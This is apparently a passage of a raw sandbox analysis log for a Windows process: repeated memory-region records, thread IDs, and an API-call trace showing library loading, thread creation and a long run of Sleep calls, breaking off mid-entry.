start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2793 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2794 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2795 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2796 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2797 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2798 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2799 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2800 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2801 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2802 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2803 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2804 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2805 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2806 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2807 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2808 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2809 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2810 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2811 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2812 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2813 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2814 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2815 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2816 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2817 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2818 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2819 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2820 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2821 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2822 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2823 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2824 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2825 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2826 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2827 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2828 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2829 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2830 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2849 start_va = 0x25b0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 2850 start_va = 0x25b0000 end_va = 0x25c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 2851 start_va = 0x25d0000 end_va = 0x25ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 2852 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 3071 start_va = 0x25b0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 3072 start_va = 0x25b0000 end_va = 0x25c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 3073 start_va = 0x25d0000 end_va = 0x25ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 3074 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 3093 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 3213 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 3214 start_va = 0x5f30000 end_va = 0x6029fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005f30000" filename = "" Region: id = 3215 start_va = 0x6060000 end_va = 0x60dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006060000" filename = "" Region: id = 3218 start_va = 0x25c0000 end_va = 0x25cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025c0000" filename = "" Region: id = 3361 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 3369 start_va = 0x25b0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 3370 start_va = 0x25b0000 end_va = 0x25c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 3371 start_va = 0x25d0000 end_va = 0x25ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 3372 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 4581 start_va = 0x25b0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 4582 start_va = 0x25c0000 end_va = 0x25c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 4583 start_va = 0x2670000 end_va = 0x26a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 4584 start_va = 0x25d0000 end_va = 0x25e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 4585 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 4586 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 4587 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 4588 start_va = 0x4770000 end_va = 0x47effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004770000" filename = "" Region: id = 4589 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 4590 start_va = 0x5e50000 end_va = 0x5f49fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005e50000" filename = "" Region: id = 4661 start_va = 0x25b0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 4662 start_va = 0x25d0000 end_va = 0x25e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 4663 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 4664 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 5062 start_va = 0x25b0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 5063 start_va = 0x25d0000 end_va = 0x25e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 5064 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 5065 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 6011 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 8605 start_va = 0x25b0000 end_va = 0x25befff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Thread: id = 3 os_tid = 0xd3c Thread: id = 4 os_tid = 0xcf0 Thread: id = 5 os_tid = 0xce8 Thread: id = 6 os_tid = 0x8c0 Thread: id = 7 os_tid = 0x8b0 Thread: id = 8 os_tid = 0x8a8 Thread: id = 9 os_tid = 0x73c Thread: id = 10 os_tid = 0x728 Thread: id = 11 os_tid = 0x23c Thread: id = 12 os_tid = 0x714 Thread: id = 13 os_tid = 0x5d8 Thread: id = 14 os_tid = 0x7f0 Thread: id = 15 os_tid = 0x5b0 Thread: id = 16 os_tid = 0x320 Thread: id = 17 os_tid = 0x594 Thread: id = 18 os_tid = 0x588 Thread: id = 19 os_tid = 0x4b8 Thread: id = 20 os_tid = 0x4b4 Thread: id = 21 os_tid = 0x434 Thread: id = 22 os_tid = 0x7e4 Thread: id = 23 os_tid = 0x5dc Thread: id = 24 os_tid = 0x544 Thread: id = 25 os_tid = 0x4e4 Thread: id = 26 os_tid = 0x4cc Thread: id = 27 os_tid = 0x4c8 Thread: id = 28 os_tid = 0x4c4 Thread: id = 29 os_tid = 0x4a8 Thread: id = 30 os_tid = 0x4a4 Thread: id = 31 os_tid = 0x4a0 Thread: id = 32 os_tid = 0x404 Thread: id = 33 os_tid = 0x288 Thread: id = 34 os_tid = 0x168 Thread: id = 35 os_tid = 0x148 Thread: id = 36 os_tid = 0x180 Thread: id = 37 os_tid = 0x394 Thread: id = 38 os_tid = 0x13c Thread: id = 39 os_tid = 0xe68 [0083.493] LoadLibraryA (lpLibFileName="NTDLL") returned 0x77800000 [0083.495] GetProcAddress (hModule=0x77800000, lpProcName="RtlExitUserThread") returned 0x77846930 [0083.497] RtlCreateHeap (Flags=0x1002, HeapBase=0x0, ReserveSize=0x0, CommitSize=0x0, Lock=0x0, Parameters=0x0) returned 0x7f10000 [0084.391] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x10) returned 0x7f112f0 [0084.391] LoadLibraryA (lpLibFileName="user32") returned 0x775e0000 [0084.391] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f112f0) returned 0x10 [0084.406] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f112f0) returned 1 [0084.406] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x12) returned 0x7f112f0 [0084.406] LoadLibraryA (lpLibFileName="advapi32") returned 0x7fefefb0000 [0084.407] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f112f0) returned 0x12 [0084.407] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f112f0) returned 1 [0084.407] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x10) returned 0x7f112f0 [0084.407] LoadLibraryA (lpLibFileName="urlmon") returned 0x7fefdb20000 [0084.408] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f112f0) returned 0x10 [0084.408] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f112f0) returned 1 [0084.408] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0xf) returned 0x7f112f0 [0084.408] LoadLibraryA (lpLibFileName="ole32") returned 0x7feff2f0000 [0084.408] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f112f0) returned 0xf [0084.408] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f112f0) returned 1 [0084.408] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x11) returned 0x7f112f0 [0084.408] LoadLibraryA (lpLibFileName="winhttp") returned 0x7fef5a80000 [0085.445] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f112f0) returned 0x11 [0085.445] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f112f0) returned 1 [0085.445] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x10) returned 0x7f112f0 [0085.445] LoadLibraryA (lpLibFileName="ws2_32") returned 0x7feffac0000 [0085.446] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f112f0) returned 0x10 [0085.446] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f112f0) returned 1 [0085.446] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x10) returned 0x7f112f0 [0085.446] LoadLibraryA (lpLibFileName="dnsapi") returned 0x7fefce60000 [0085.455] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f112f0) returned 0x10 [0085.456] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f112f0) returned 1 [0085.456] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x11) returned 0x7f112f0 [0085.456] LoadLibraryA (lpLibFileName="shell32") returned 0x7fefdee0000 [0085.456] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f112f0) returned 0x11 [0085.456] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f112f0) returned 1 [0085.457] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x3943ca4, lpParameter=0x27a0000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1484 [0085.459] CloseHandle (hObject=0x1484) returned 1 [0085.459] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x3943d80, lpParameter=0x27a0000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1484 [0085.460] CloseHandle (hObject=0x1484) returned 1 [0085.460] Sleep (dwMilliseconds=0xa) [0085.465] Sleep (dwMilliseconds=0xa) [0085.481] Sleep (dwMilliseconds=0xa) [0085.497] Sleep (dwMilliseconds=0xa) [0085.512] Sleep (dwMilliseconds=0xa) [0085.528] Sleep (dwMilliseconds=0xa) [0085.545] Sleep (dwMilliseconds=0xa) [0085.559] Sleep (dwMilliseconds=0xa) [0085.575] Sleep (dwMilliseconds=0xa) [0085.590] Sleep (dwMilliseconds=0xa) [0085.606] Sleep (dwMilliseconds=0xa) [0085.622] Sleep (dwMilliseconds=0xa) [0085.637] Sleep (dwMilliseconds=0xa) [0085.653] Sleep (dwMilliseconds=0xa) [0085.669] Sleep (dwMilliseconds=0xa) [0085.684] Sleep (dwMilliseconds=0xa) [0085.718] Sleep (dwMilliseconds=0xa) [0085.731] Sleep (dwMilliseconds=0xa) [0085.748] Sleep (dwMilliseconds=0xa) [0085.762] Sleep (dwMilliseconds=0xa) [0085.778] Sleep (dwMilliseconds=0xa) [0085.794] Sleep (dwMilliseconds=0xa) [0085.809] Sleep (dwMilliseconds=0xa) [0085.825] Sleep (dwMilliseconds=0xa) [0085.840] Sleep (dwMilliseconds=0xa) [0085.857] Sleep (dwMilliseconds=0xa) [0085.871] Sleep (dwMilliseconds=0xa) [0085.887] Sleep (dwMilliseconds=0xa) [0085.902] Sleep (dwMilliseconds=0xa) [0085.922] Sleep (dwMilliseconds=0xa) [0085.934] Sleep (dwMilliseconds=0xa) [0085.950] Sleep (dwMilliseconds=0xa) [0085.965] Sleep (dwMilliseconds=0xa) [0085.990] Sleep (dwMilliseconds=0xa) [0085.996] Sleep (dwMilliseconds=0xa) [0086.012] Sleep (dwMilliseconds=0xa) [0086.027] Sleep (dwMilliseconds=0xa) [0086.043] Sleep (dwMilliseconds=0xa) [0086.058] Sleep (dwMilliseconds=0xa) [0086.075] Sleep (dwMilliseconds=0xa) [0086.090] Sleep (dwMilliseconds=0xa) [0086.106] Sleep (dwMilliseconds=0xa) [0086.121] Sleep (dwMilliseconds=0xa) [0086.136] Sleep (dwMilliseconds=0xa) [0086.152] Sleep (dwMilliseconds=0xa) [0086.168] Sleep (dwMilliseconds=0xa) [0086.184] Sleep (dwMilliseconds=0xa) [0086.199] Sleep (dwMilliseconds=0xa) [0086.214] Sleep (dwMilliseconds=0xa) [0086.239] Sleep (dwMilliseconds=0xa) [0086.248] Sleep (dwMilliseconds=0xa) [0086.261] Sleep (dwMilliseconds=0xa) [0086.277] Sleep (dwMilliseconds=0xa) [0086.293] Sleep (dwMilliseconds=0xa) [0086.310] Sleep (dwMilliseconds=0xa) [0086.324] Sleep (dwMilliseconds=0xa) [0086.339] Sleep (dwMilliseconds=0xa) [0086.355] Sleep (dwMilliseconds=0xa) [0086.374] Sleep (dwMilliseconds=0xa) [0086.386] Sleep (dwMilliseconds=0xa) [0086.403] Sleep (dwMilliseconds=0xa) [0086.418] Sleep (dwMilliseconds=0xa) [0086.464] Sleep (dwMilliseconds=0xa) [0086.483] Sleep (dwMilliseconds=0xa) [0086.495] Sleep (dwMilliseconds=0xa) [0086.511] Sleep (dwMilliseconds=0xa) [0086.526] Sleep (dwMilliseconds=0xa) [0086.542] Sleep (dwMilliseconds=0xa) [0086.559] Sleep (dwMilliseconds=0xa) [0086.574] Sleep (dwMilliseconds=0xa) [0086.589] Sleep (dwMilliseconds=0xa) [0086.637] Sleep (dwMilliseconds=0xa) [0086.657] Sleep (dwMilliseconds=0xa) [0086.667] Sleep (dwMilliseconds=0xa) [0086.682] Sleep (dwMilliseconds=0xa) [0086.717] Sleep (dwMilliseconds=0xa) [0086.729] Sleep (dwMilliseconds=0xa) [0086.745] Sleep (dwMilliseconds=0xa) [0086.763] Sleep (dwMilliseconds=0xa) [0086.808] Sleep (dwMilliseconds=0xa) [0086.829] Sleep (dwMilliseconds=0xa) [0086.838] Sleep (dwMilliseconds=0xa) [0086.870] Sleep (dwMilliseconds=0xa) [0086.885] Sleep (dwMilliseconds=0xa) [0086.901] Sleep (dwMilliseconds=0xa) [0086.916] Sleep (dwMilliseconds=0xa) [0086.933] Sleep (dwMilliseconds=0xa) [0086.979] Sleep (dwMilliseconds=0xa) [0086.998] Sleep (dwMilliseconds=0xa) [0087.010] Sleep (dwMilliseconds=0xa) [0087.025] Sleep (dwMilliseconds=0xa) [0087.042] Sleep (dwMilliseconds=0xa) [0087.057] Sleep (dwMilliseconds=0xa) [0087.072] Sleep (dwMilliseconds=0xa) [0087.089] Sleep (dwMilliseconds=0xa) [0087.104] Sleep (dwMilliseconds=0xa) [0087.151] Sleep (dwMilliseconds=0xa) [0087.172] Sleep (dwMilliseconds=0xa) [0087.182] Sleep (dwMilliseconds=0xa) [0087.197] Sleep (dwMilliseconds=0xa) [0087.213] Sleep (dwMilliseconds=0xa) [0087.229] Sleep (dwMilliseconds=0xa) [0087.244] Sleep (dwMilliseconds=0xa) [0087.262] Sleep (dwMilliseconds=0xa) [0087.291] Sleep (dwMilliseconds=0xa) [0087.337] Sleep (dwMilliseconds=0xa) [0087.354] Sleep (dwMilliseconds=0xa) [0087.369] Sleep (dwMilliseconds=0xa) [0087.384] Sleep (dwMilliseconds=0xa) [0087.400] Sleep (dwMilliseconds=0xa) [0087.416] Sleep (dwMilliseconds=0xa) [0087.431] Sleep (dwMilliseconds=0xa) [0087.448] Sleep (dwMilliseconds=0xa) [0087.495] Sleep (dwMilliseconds=0xa) [0087.517] Sleep (dwMilliseconds=0xa) [0087.556] Sleep (dwMilliseconds=0xa) [0087.572] Sleep (dwMilliseconds=0xa) [0087.587] Sleep (dwMilliseconds=0xa) [0087.603] Sleep (dwMilliseconds=0xa) [0087.618] Sleep (dwMilliseconds=0xa) [0087.665] Sleep (dwMilliseconds=0xa) [0087.681] Sleep (dwMilliseconds=0xa) [0087.716] Sleep (dwMilliseconds=0xa) [0087.728] Sleep (dwMilliseconds=0xa) [0087.743] Sleep (dwMilliseconds=0xa) [0087.759] Sleep (dwMilliseconds=0xa) [0087.774] Sleep (dwMilliseconds=0xa) [0087.821] Sleep (dwMilliseconds=0xa) [0087.838] Sleep (dwMilliseconds=0xa) [0087.852] Sleep (dwMilliseconds=0xa) [0087.870] Sleep (dwMilliseconds=0xa) [0087.884] Sleep (dwMilliseconds=0xa) [0087.899] Sleep (dwMilliseconds=0xa) [0087.915] Sleep (dwMilliseconds=0xa) [0087.930] Sleep (dwMilliseconds=0xa) [0087.946] Sleep (dwMilliseconds=0xa) [0087.994] Sleep (dwMilliseconds=0xa) [0088.012] Sleep (dwMilliseconds=0xa) [0088.025] Sleep (dwMilliseconds=0xa) [0088.040] Sleep (dwMilliseconds=0xa) [0088.055] Sleep (dwMilliseconds=0xa) [0088.071] Sleep (dwMilliseconds=0xa) [0088.086] Sleep (dwMilliseconds=0xa) [0088.111] Sleep (dwMilliseconds=0xa) [0088.118] Sleep (dwMilliseconds=0xa) [0088.165] Sleep (dwMilliseconds=0xa) [0088.205] Sleep (dwMilliseconds=0xa) [0088.212] Sleep (dwMilliseconds=0xa) [0088.227] Sleep (dwMilliseconds=0xa) [0088.242] Sleep (dwMilliseconds=0xa) [0088.262] Sleep (dwMilliseconds=0xa) [0088.273] Sleep (dwMilliseconds=0xa) [0088.289] Sleep (dwMilliseconds=0xa) [0088.305] Sleep (dwMilliseconds=0xa) [0088.352] Sleep (dwMilliseconds=0xa) [0088.384] Sleep (dwMilliseconds=0xa) [0088.398] Sleep (dwMilliseconds=0xa) [0088.414] Sleep (dwMilliseconds=0xa) [0088.431] Sleep (dwMilliseconds=0xa) [0088.445] Sleep (dwMilliseconds=0xa) [0088.461] Sleep (dwMilliseconds=0xa) [0088.476] Sleep (dwMilliseconds=0xa) [0088.493] Sleep (dwMilliseconds=0xa) [0088.557] Sleep (dwMilliseconds=0xa) [0088.576] Sleep (dwMilliseconds=0xa) [0088.588] Sleep (dwMilliseconds=0xa) [0088.602] Sleep (dwMilliseconds=0xa) [0088.617] Sleep (dwMilliseconds=0xa) [0088.632] Sleep (dwMilliseconds=0xa) [0088.656] Sleep (dwMilliseconds=0xa) [0088.666] Sleep (dwMilliseconds=0xa) [0088.680] Sleep (dwMilliseconds=0xa) [0088.742] Sleep (dwMilliseconds=0xa) [0088.768] Sleep (dwMilliseconds=0xa) [0088.773] Sleep (dwMilliseconds=0xa) [0088.788] Sleep (dwMilliseconds=0xa) [0088.804] Sleep (dwMilliseconds=0xa) [0088.820] Sleep (dwMilliseconds=0xa) [0088.835] Sleep (dwMilliseconds=0xa) [0088.851] Sleep (dwMilliseconds=0xa) [0088.867] Sleep (dwMilliseconds=0xa) [0088.913] Sleep (dwMilliseconds=0xa) [0088.934] Sleep (dwMilliseconds=0xa) [0088.945] Sleep (dwMilliseconds=0xa) [0088.961] Sleep (dwMilliseconds=0xa) [0088.977] Sleep (dwMilliseconds=0xa) [0088.991] Sleep (dwMilliseconds=0xa) [0089.007] Sleep (dwMilliseconds=0xa) [0089.033] Sleep (dwMilliseconds=0xa) [0089.071] Sleep (dwMilliseconds=0xa) [0089.092] Sleep (dwMilliseconds=0xa) [0089.101] Sleep (dwMilliseconds=0xa) [0089.116] Sleep (dwMilliseconds=0xa) [0089.132] Sleep (dwMilliseconds=0xa) [0089.147] Sleep (dwMilliseconds=0xa) [0089.163] Sleep (dwMilliseconds=0xa) [0089.179] Sleep (dwMilliseconds=0xa) [0089.195] Sleep (dwMilliseconds=0xa) [0089.241] Sleep (dwMilliseconds=0xa) [0089.256] Sleep (dwMilliseconds=0xa) [0089.272] Sleep (dwMilliseconds=0xa) [0089.288] Sleep (dwMilliseconds=0xa) [0089.307] Sleep (dwMilliseconds=0xa) [0089.319] Sleep (dwMilliseconds=0xa) [0089.335] Sleep (dwMilliseconds=0xa) [0089.350] Sleep (dwMilliseconds=0xa) [0089.398] Sleep (dwMilliseconds=0xa) [0089.413] Sleep (dwMilliseconds=0xa) [0089.428] Sleep (dwMilliseconds=0xa) [0089.444] Sleep (dwMilliseconds=0xa) [0089.460] Sleep (dwMilliseconds=0xa) [0089.475] Sleep (dwMilliseconds=0xa) [0089.492] Sleep (dwMilliseconds=0xa) [0089.507] Sleep (dwMilliseconds=0xa) [0089.556] Sleep (dwMilliseconds=0xa) [0089.569] Sleep (dwMilliseconds=0xa) [0089.585] Sleep (dwMilliseconds=0xa) [0089.604] Sleep (dwMilliseconds=0xa) [0089.615] Sleep (dwMilliseconds=0xa) [0089.631] Sleep (dwMilliseconds=0xa) [0089.647] Sleep (dwMilliseconds=0xa) [0089.662] Sleep (dwMilliseconds=0xa) [0089.696] Sleep (dwMilliseconds=0xa) [0089.732] Sleep (dwMilliseconds=0xa) [0089.740] Sleep (dwMilliseconds=0xa) [0089.756] Sleep (dwMilliseconds=0xa) [0089.771] Sleep (dwMilliseconds=0xa) [0089.787] Sleep (dwMilliseconds=0xa) [0089.803] Sleep (dwMilliseconds=0xa) [0089.818] Sleep (dwMilliseconds=0xa) [0089.834] Sleep (dwMilliseconds=0xa) [0089.884] Sleep (dwMilliseconds=0xa) [0089.896] Sleep (dwMilliseconds=0xa) [0089.912] Sleep (dwMilliseconds=0xa) [0089.927] Sleep (dwMilliseconds=0xa) [0089.943] Sleep (dwMilliseconds=0xa) [0089.959] Sleep (dwMilliseconds=0xa) [0089.976] Sleep (dwMilliseconds=0xa) [0090.016] Sleep (dwMilliseconds=0xa) [0090.064] Sleep (dwMilliseconds=0xa) [0090.098] Sleep (dwMilliseconds=0xa) [0090.112] Sleep 